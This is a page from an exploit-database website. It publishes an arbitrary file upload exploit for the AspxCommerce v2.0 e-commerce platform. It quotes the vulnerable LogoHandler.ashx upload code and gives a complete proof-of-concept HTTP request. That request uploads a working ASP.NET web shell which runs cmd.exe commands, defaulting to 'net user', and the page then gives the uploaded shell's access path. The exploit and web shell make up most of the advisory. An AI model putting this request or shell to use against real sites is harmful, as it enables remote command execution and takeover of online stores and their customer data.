0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AspxCommerce v2.0 - Arbitrary File Upload Vulnerability
[# Exploit Title: AspxCommerce v2.0 - Arbitrary File Upload Vulnerability
# Exploit Author: SANTHO
# Vendor Homepage: http://www.aspxcommerce.com/
# Version: Version 2.0 and below
Introduction:
~~~~~~~~~~~~~
AspxCommerce is a complete e-Commerce solution for setting up a fully
functional online store in minutes. It's fully customizable with rich set
of features.
You can customize the complete front end, change the look and feel, create
categories and subcategories, add and modify products, accept payments
through credit cards and facilitates a lot of other features.
Exploitation Details:
~~~~~~~~~~~~~~~~~~~~~
The application doesn't sanitize file extension or content in the Logo
Editing module. The vulnerability allows a remote attacker to upload files
via POST method with multiple extensions and access them remotely.
Vulnerable Module : LogoHandler.ashx
Vulnerable Code :
string strFileName =
Path.GetFileName(context.Request.Files[0].FileName);
string strExtension =
Path.GetExtension(context.Request.Files[0].FileName).ToLower();
strFileName = strFileName.Substring(0, strFileName.Length -
strExtension.Length);
strFileName = strFileName + '_' + rnd.Next(111111,
999999).ToString() + strExtension;
int strSize = HttpContext.Current.Request.Files[0].ContentLength;
string strBaseLocation =
HttpContext.Current.Server.MapPath("~/Modules/Logo/image/");
if (!Directory.Exists(strBaseLocation))
{
Directory.CreateDirectory(strBaseLocation);
}
string strSaveLocation = strBaseLocation + strFileName;
HttpContext.Current.Request.Files[0].SaveAs(strSaveLocation);
retMsg = "Modules/Logo/image/" + strFileName;
Proof of Concept:
~~~~~~~~~~~~~~~~~
POST /Modules/Logo/LogoHandler.ashx HTTP/1.1
Host: aspxcommerce.localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://aspxcommerce.localhost/Sagin/HandleModuleControls.aspx?uid=342&pid=1
Cookie: nessus-session=false; VisitCount=10; OriginalURL=
http://aspxcommerce.localhost/; ASP.NET_SessionId=ks51au3fwkgnmtebeznhl245;
__zlcid=%7B%22mID%22%3A%22L0dAifDhLZG23y%22%2C%22sid%22%3A%22130919.327274.49Hg448a%22%7D;
OriginalReferrer=http://aspxcommerce.localhost/;
SageUserRolesCookie=SageUserRolesCookie=Site
Admin&SageUserRolesProtected=910f0c31-e1dd-42d2-988b-545fe8621544;
SageFrame.AUTH__1=4374B9AB7C8ACCE26B3DF7734F2DEA168E06E27D8852C0346F86CDB566D2B9D22A256A9C56F561DCFF57A79F473E37DAF19D7E8AFC32D97DE3CAAA0769B8D3FDC604FDCF6768838E3C30E0E9C84974B0373627A00D793AA792590BAB93CF6EF8105E81E156A0DEB1E0910C1BC1583AC69F3FDFEC
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------56701790317916
Content-Length: 1789
-----------------------------56701790317916
Content-Disposition: form-data; name="myfile[]"; filename="cmd.aspx"
Content-Type: application/octet-stream
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
myProcessStartInfo.UseShellExecute = false
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xcmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","<")
mystring=replace(mystring,">",">")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
End Sub
</script>
<html>
<body>
<form runat="server">
<p><asp:Label id="L_p" runat="server"
width="80px">Program</asp:Label>
<asp:TextBox id="xpath" runat="server"
Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
<p><asp:Label id="L_a" runat="server"
width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c
net user</asp:TextBox>
<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px"
Text="Run"></asp:Button>
<p><asp:Label id="result" runat="server"></asp:Label>
</form>
</body>
</html>
-----------------------------56701790317916--
Uploaded Shell's Access Path :
http://aspxcommerce.localhost/Modules/Logo/image/cmd_134724.aspx
--
SANTHO
twitter : @s4n70 <https://twitter.com/s4n7h0>
# 0day.today [2024-11-15] #